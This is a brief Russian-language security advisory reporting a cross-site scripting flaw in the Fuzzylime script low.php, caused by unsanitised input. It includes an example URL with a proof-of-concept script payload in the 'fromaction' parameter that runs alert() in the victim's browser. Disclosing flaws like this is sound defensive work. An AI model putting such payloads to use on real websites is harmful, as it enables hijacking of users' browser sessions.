Программа: Fuzzylime

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценарием Low.PHP. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://www.example.com/path/low.php?action=log& fromforum=111-222-1933email@address.com&fromtopic= 111-222-1933email@address.com&fromaction= >"><ScRiPt%20%0a%0d>alert(21 407654)%3B</ScRiPt>



Оставить мнение